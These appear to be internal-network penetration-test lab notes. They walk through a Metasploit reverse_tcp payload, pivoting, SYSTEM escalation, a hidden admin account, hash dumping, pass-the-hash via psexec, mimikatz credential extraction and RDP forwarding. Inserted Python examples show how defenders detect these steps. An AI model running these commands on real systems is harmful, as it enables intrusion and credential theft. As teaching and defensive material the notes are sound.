5. Common internal-network penetration tests
(Internal-network penetration series)
Lab topology sketch:
Public side: 22.22.22.22
Internal side: 192.168.0.1
A real company network is not this flat: there is a DMZ (isolation zone), a server in it that I connect to, and behind it the database and backup servers are physically isolated.
Generate the attack payload (LHOST must be the address the handler listens on; these notes use 192.168.0.105 here and 192.168.0.196 in the handler, so make them match):
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 lport=12345 -f exe >/var/www/html/s.exe
Local listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.196
set lport 12345
exploit
Add a route through the session
run autoroute -s 10.10.10.0/24
View the routing table
run autoroute -p
Clear the routes
run autoroute -d
Privilege escalation (and basic post-exploitation) commands:
sysinfo  --> show system information
View the target's routing table
route
ps  --> list processes
migrate  --> inject into another process (ps output columns: PID PPID Name)
1836 1820 explorer.exe
migrate 1836
getuid  --> current user
getprivs  --> enable as many privileges as possible on the current token
getsystem  --> escalate to SYSTEM via several techniques
meterpreter > getuid
Server username: WWW-6DA2DD109F0\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
shell  --> drop into a command shell on the target
Add an administrator account
net user moon$ moon123 /add & net localgroup administrators moon$ /add
Detect live hosts
run post/multi/gather/ping_sweep RHOSTS=192.168.220.0/24
run post/windows/gather/arp_scanner RHOSTS=192.168.220.0/24
meterpreter > run post/multi/gather/ping_sweep RHOSTS=10.10.10.0/24
[*] Performing ping sweep for IP range 10.10.10.0/24
[+] 10.10.10.1 host found
[+] 10.10.10.133 host found
[+] 10.10.10.130 host found
meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
[*] Running module against WWW-6DA2DD109F0
[*] ARP Scanning 10.10.10.0/24
[+] IP: 10.10.10.1 MAC 00:50:56:c0:00:02 (VMware, Inc.)
[+] IP: 10.10.10.133 MAC 00:0c:29:a9:46:ac (VMware, Inc.)
[+] IP: 10.10.10.131 MAC 00:0c:29:cb:a1:70 (VMware, Inc.)
[+] IP: 10.10.10.130 MAC 00:0c:29:27:b3:4a (VMware, Inc.)
[+] IP: 10.10.10.254 MAC 00:50:56:f3:19:f7 (VMware, Inc.)
SOCKS proxy: use nmap through it to scan services on internal IPs
use auxiliary/server/socks4a
set SRVHOST 192.168.0.115
exploit
gedit /etc/proxychains.conf  --> point the ProxyList at the SOCKS server started above (192.168.0.115 port 1080, as the proxychains output below shows)
Scan hosts .130 to .135 in 10.10.10.0/24 for ports 22, 80, 445 and 3306, show only the open ones and save the result to 10.10.10.0.txt (-sT -Pn is required because a SOCKS proxy only carries full TCP connections, so SYN scans and ICMP pings cannot pass through it):
proxychains nmap -sT -Pn -p 445,22,80,3306 10.10.10.130-135 --open -oN 10.10.10.0.txt
background  --> put the current session in the background
sessions -i <id>  --> list sessions / interact with one
root@kali:~# proxychains nmap -sT -Pn -p 445,22,80,3306 10.10.10.134 --open -oN 10.10.10.0.txt
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-31 16:10 CST
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:22-<--denied
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:445-<><>-OK
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:3306-<><>-OK
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:80-<><>-OK
Nmap scan report for 10.10.10.134
Host is up (0.78s latency).
Not shown: 1 closed port
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3306/tcp open mysql
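The ping sweep, ARP scan and proxied nmap scan above all look the same from inside the network: one internal host suddenly reaching many neighbours, or many ports on one neighbour, within a short window. The Python below is an added example (not part of the original notes) of the detection logic a defender would run over flow or firewall logs; the log lines, the pivot address 10.10.10.133, the record layout and the thresholds are all constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow log, one record per line: "<iso-timestamp> <src> <dst> <proto> <dport>".
# 10.10.10.133 is assumed (not stated on the page) to be the compromised web server used
# as the pivot; .1-.12 receive a ping sweep and .134 a scan of 22/445/3306/80.
# 10.10.10.130 -> .134:3306 and 10.10.10.131 -> .1:53 are normal background traffic.
SAMPLE_FLOWS = """\
2018-03-31T16:09:00 10.10.10.133 10.10.10.1 icmp 0
2018-03-31T16:09:01 10.10.10.133 10.10.10.2 icmp 0
2018-03-31T16:09:02 10.10.10.133 10.10.10.3 icmp 0
2018-03-31T16:09:03 10.10.10.133 10.10.10.4 icmp 0
2018-03-31T16:09:04 10.10.10.133 10.10.10.5 icmp 0
2018-03-31T16:09:05 10.10.10.133 10.10.10.6 icmp 0
2018-03-31T16:09:06 10.10.10.133 10.10.10.7 icmp 0
2018-03-31T16:09:07 10.10.10.133 10.10.10.8 icmp 0
2018-03-31T16:09:08 10.10.10.133 10.10.10.9 icmp 0
2018-03-31T16:09:09 10.10.10.133 10.10.10.10 icmp 0
2018-03-31T16:09:10 10.10.10.133 10.10.10.11 icmp 0
2018-03-31T16:09:10 10.10.10.130 10.10.10.134 tcp 3306
2018-03-31T16:09:11 10.10.10.133 10.10.10.12 icmp 0
2018-03-31T16:09:15 10.10.10.131 10.10.10.1 udp 53
2018-03-31T16:09:40 10.10.10.130 10.10.10.134 tcp 3306
2018-03-31T16:10:01 10.10.10.133 10.10.10.134 tcp 22
2018-03-31T16:10:02 10.10.10.133 10.10.10.134 tcp 445
2018-03-31T16:10:03 10.10.10.133 10.10.10.134 tcp 3306
2018-03-31T16:10:04 10.10.10.133 10.10.10.134 tcp 80
2018-03-31T16:10:20 10.10.10.130 10.10.10.134 tcp 3306
"""


def parse_flows(text):
    """Parse the constructed flow format into dicts with a datetime timestamp."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, proto, dport = line.split()
        flows.append({"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
                      "proto": proto, "dport": int(dport)})
    return flows


def detect_sweeps(flows, window_s=60, host_threshold=10, port_threshold=4):
    """Return {(src, kind): count} for sources whose fan-out inside any window_s-second
    window reaches a threshold. kind is 'host-sweep' (many distinct destinations) or
    'port-scan:<dst>' (many distinct TCP ports on one destination). Thresholds are
    illustrative; tune them to the environment."""
    alerts = {}
    by_src = defaultdict(list)
    for f in flows:
        by_src[f["src"]].append(f)
    for src, fs in by_src.items():
        fs.sort(key=lambda f: f["ts"])
        for i, first in enumerate(fs):
            end = first["ts"] + timedelta(seconds=window_s)
            window = [f for f in fs[i:] if f["ts"] <= end]
            hosts = {f["dst"] for f in window}
            if len(hosts) >= host_threshold:
                key = (src, "host-sweep")
                alerts[key] = max(alerts.get(key, 0), len(hosts))
            ports = defaultdict(set)
            for f in window:
                if f["proto"] == "tcp":
                    ports[f["dst"]].add(f["dport"])
            for dst, ps in ports.items():
                if len(ps) >= port_threshold:
                    key = (src, f"port-scan:{dst}")
                    alerts[key] = max(alerts.get(key, 0), len(ps))
    return alerts


if __name__ == "__main__":
    for (src, kind), count in sorted(detect_sweeps(parse_flows(SAMPLE_FLOWS)).items()):
        print(f"{src}: {kind} ({count})")
```

Because the scan is tunnelled through the Meterpreter session, the perimeter only ever sees the reverse_tcp connection to port 12345; every probe against 10.10.10.0/24 originates from the pivot's own internal address, which is why this kind of per-host fan-out check belongs on internal flow data rather than on the edge firewall.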
445 is open: try a pass-the-hash attack against it
Dump the password hashes (on Kali 2021 the Meterpreter command is hashdump, not dumphash):
meterpreter > dumphash
[-] Unknown command: dumphash.
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:384439c08fe914c385269bab29af3964:c35732f890930ace60f75b43c5fce5f8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-6DA2DD109F0:1000:36da9815c5fd6064a46db2d4ededfaa2:a659d8140be35d693c8270fe84763529:::
IWAM_WWW-6DA2DD109F0:1001:703965fc8ad76fe786c7376481ac8155:36d9f3f998a3fd4f10e36f18bf3d3428:::
MYSQL_ZKEYS:1007:760a02892b914e738c91ea175b8d6cbc:1bdba7bf880370b6f117e912abbd054f:::
PhpMyAdmin_ZKEYS:1008:88ad4d59bbbac9b5c8c5fecdb31f4286:6e867d035fe07ea95ed151d320ea6b38:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:d39af09888207cd455a882d364de2c44:::
use exploit/windows/smb/psexec  --> select the psexec exploit module
set payload windows/meterpreter/bind_tcp
show options  --> show the configuration options
set RHOST 192.168.2.107  --> set the target to 192.168.2.107, port defaults to 445 (the isolated target)
set SMBUser Administrator  --> set the account (the note says wing; the command uses Administrator)
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4  --> the LM:NT pair from hashdump is accepted in place of a password
exploit  --> run the attack
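The psexec module above authenticates with the dumped LM:NT pair and then installs and starts a service on the target, and the net user ... /add line earlier creates a local administrator. On the target each step leaves a log trace a defender can correlate: a network logon (Security event 4624, logon type 3) authenticated with NTLM followed within seconds by a service install (System event 7045), and an account creation (4720) followed by an addition to the Administrators group (4732). An NTLM network logon on its own is routine on a workgroup network; the pairing is the signal. The Python below is an added example (not part of the original notes) of that correlation over constructed event records; the host name DB01, the service name, the simplified field names and the 60-second window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed Windows event records (not from the page). Field names are simplified
# from the Security (4624/4720/4732) and System (7045) log schemas; DB01 and the
# service name are invented.
EVENTS = [
    # pass-the-hash network logon from the pivot, then a service install 3 s later
    {"ts": "2018-03-31T16:12:00", "host": "DB01", "id": 4624, "LogonType": 3,
     "AuthPackage": "NTLM", "IpAddress": "10.10.10.133", "TargetUser": "Administrator"},
    {"ts": "2018-03-31T16:12:03", "host": "DB01", "id": 7045,
     "ServiceName": "VfRqTzlp", "ImagePath": r"%SYSTEMROOT%\VfRqTzlp.exe"},
    # backdoor account creation followed by local Administrators membership
    {"ts": "2018-03-31T16:13:10", "host": "DB01", "id": 4720,
     "TargetUser": "moon$", "SubjectUser": "Administrator"},
    {"ts": "2018-03-31T16:13:11", "host": "DB01", "id": 4732,
     "GroupName": "Administrators", "MemberName": "moon$"},
    # benign: an application server reaching a share with NTLM, no service follows
    {"ts": "2018-03-31T16:20:00", "host": "DB01", "id": 4624, "LogonType": 3,
     "AuthPackage": "NTLM", "IpAddress": "10.10.10.130", "TargetUser": "svc_app"},
    # benign: a service account added to Backup Operators, not Administrators
    {"ts": "2018-03-31T16:25:00", "host": "DB01", "id": 4720,
     "TargetUser": "svc_backup", "SubjectUser": "Administrator"},
    {"ts": "2018-03-31T16:25:02", "host": "DB01", "id": 4732,
     "GroupName": "Backup Operators", "MemberName": "svc_backup"},
]


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def correlate(events, window_s=60):
    """Return alerts for (a) an NTLM network logon followed by a service install on the
    same host and (b) an account creation followed by Administrators membership."""
    events = sorted(events, key=_ts)
    alerts = []
    for i, e in enumerate(events):
        horizon = _ts(e) + timedelta(seconds=window_s)
        later = [x for x in events[i + 1:]
                 if x["host"] == e["host"] and _ts(x) <= horizon]
        if e["id"] == 4624 and e.get("LogonType") == 3 and e.get("AuthPackage") == "NTLM":
            svc = next((x for x in later if x["id"] == 7045), None)
            if svc:
                alerts.append({"kind": "pth-psexec", "host": e["host"],
                               "src": e["IpAddress"], "user": e["TargetUser"],
                               "service": svc["ServiceName"]})
        if e["id"] == 4720:
            new_user = e["TargetUser"]
            grp = next((x for x in later if x["id"] == 4732
                        and x.get("MemberName") == new_user
                        and x.get("GroupName") == "Administrators"), None)
            if grp:
                # a trailing "$" hides the account from plain `net user` listings
                alerts.append({"kind": "new-local-admin", "host": e["host"],
                               "user": new_user, "created_by": e["SubjectUser"],
                               "hidden_from_net_user": new_user.endswith("$")})
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a)
```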
Online hash lookup: http://www.objectif-securite.ch/ophcrack.php
meterpreter > hashdump
$darkmoon:1007:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:5985e076bb5b336a68e72c98631f9aff:017da1acf97bddd9c5e0738d83d228bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-B1EEB20D93D:1000:dda60bedc85fec8b974b70c87076e405:30752eaa18bfcef79b0d85bfe4154703:::
IWAM_WWW-B1EEB20D93D:1001:7dd2a148a6f23d466313eb40c0a94f66:690d92e838a54505a958e08f328f5268:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:dd1c6d0f2ca8a40e8b0de3852be70665:::
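Both hashdump listings on this page are in pwdump format (user:RID:LM:NT:::), and a defender reading them can see more than "the hashes are out". The Python below is an added example (not part of the original notes) that parses that format and flags the weaknesses visible in the second dump: LM hashes are still being stored (an LM hash other than the all-empty aad3b435b51404eeaad3b435b51404ee), an LM second half equal to aad3b435b51404ee means the password is 7 characters or shorter, an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 means a blank password, and two accounts sharing one NT hash means password reuse. The sample input is the page's own second dump; the finding labels are my own.

```python
import re
from collections import defaultdict

# pwdump/hashdump line format: user:RID:LM_hash:NT_hash:::
EMPTY_LM_HALF = "aad3b435b51404ee"              # LM of an empty 7-byte block
EMPTY_LM = EMPTY_LM_HALF * 2                    # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Sample input: the second hashdump shown on this page.
SAMPLE = """\
$darkmoon:1007:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:5985e076bb5b336a68e72c98631f9aff:017da1acf97bddd9c5e0738d83d228bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-B1EEB20D93D:1000:dda60bedc85fec8b974b70c87076e405:30752eaa18bfcef79b0d85bfe4154703:::
IWAM_WWW-B1EEB20D93D:1001:7dd2a148a6f23d466313eb40c0a94f66:690d92e838a54505a958e08f328f5268:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:dd1c6d0f2ca8a40e8b0de3852be70665:::
"""


def parse_hashdump(text):
    """Return one dict per well-formed line; lines that do not match are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid),
                            "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries):
    """Return (account, finding) pairs describing password-storage weaknesses."""
    findings = []
    by_nt = defaultdict(list)
    for e in entries:
        if e["lm"] != EMPTY_LM:
            # LM storage is still enabled for this account (NoLMHash not enforced)
            findings.append((e["user"], "lm-stored"))
            if e["lm"].endswith(EMPTY_LM_HALF):
                # second LM block is empty: the password fits in 7 characters
                findings.append((e["user"], "lm-short-password"))
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "blank-password"))
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            # identical NT hashes mean identical passwords across accounts
            findings.append(("+".join(sorted(users)), "nt-reuse"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_hashdump(SAMPLE)):
        print(f"{finding:20s} {account}")
```

On this dump the audit shows why the later pass-the-hash step and the mimikatz output work so easily: the Administrator and $darkmoon accounts share one short password stored with an LM hash, and the mitigation is the usual one (disable LM hash storage, enforce length, and never reuse the local administrator password across accounts or hosts).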
Credential collection
load mimikatz
help mimikatz
Use mimikatz's built-in commands to dump hashes and plaintext credentials from the target.
msv
kerberos
mimikatz_command -f samdump::hashes
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;1223686 NTLM WWW-B1EEB20D93D $darkmoon lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;1530585 NTLM WWW-B1EEB20D93D Administrator lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;192355 NTLM WWW-B1EEB20D93D Administrator lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;52757 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP WWW-B1EEB20D93D$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;192355 NTLM WWW-B1EEB20D93D Administrator
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;52757 NTLM
0;999 NTLM WORKGROUP WWW-B1EEB20D93D$
0;1223686 NTLM WWW-B1EEB20D93D $darkmoon 123456
0;1530585 NTLM WWW-B1EEB20D93D Administrator 123456
meterpreter > creds_all
Enable remote desktop (3389) on the target
run getgui -e
Add an account
run getgui -u hzx -p 123456
Port forwarding
portfwd add -l 5555 -p 3389 -r 192.168.220.128  --> forward local port 5555 through the session to 3389 on 192.168.220.128
rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
Connect directly through the SOCKS proxy
proxychains rdesktop -u Administrator -p 123456 192.168.220.129